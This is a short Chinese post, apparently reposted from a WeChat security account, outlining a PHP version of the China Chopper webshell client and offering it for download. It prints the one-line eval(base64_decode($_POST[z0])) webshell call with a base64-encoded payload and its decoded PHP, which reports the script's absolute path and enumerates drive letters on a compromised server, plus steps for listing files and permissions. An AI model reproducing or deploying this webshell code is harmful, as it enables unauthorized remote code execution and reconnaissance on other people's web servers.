php版菜刀思路
1.判断一句话地址返回的http特征码是否是200/500
2.通过post传值执行函数
3.获取一句话文件的当前绝对路劲
4.获取当前服务器的盘符
5.遍历当前一句话文件目录下的目录与文件
6.获取当前一句话文件目录下的目录与文件的权限,创建时间,文件大小
***************************************************************
代码思路
=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("-+|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
echo $D."t";
if(substr($D,0,1)!="/"){
foreach(range("A","Z") as $L)
if(is_dir($L.":"))
echo($L.":");
};
echo("|<-");
die();
echo $D=dirname($_SERVER["SCRIPT_FILENAME"]); //获取绝对路劲
foreach(range("A","Z") as $L) if(is_dir($L.":")) echo($L.":");//获取盘符
下载链接:<a href="http://pan.baidu.com/s/1pL6bfJX" target="_blank">http://pan.baidu.com/s/1pL6bfJX</a> 密码: bfx3
功能可能不是很全面。代码提供给大家作为参考谢谢。
本文始发于微信公众号(飓风网络安全):php版web菜刀(开源)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论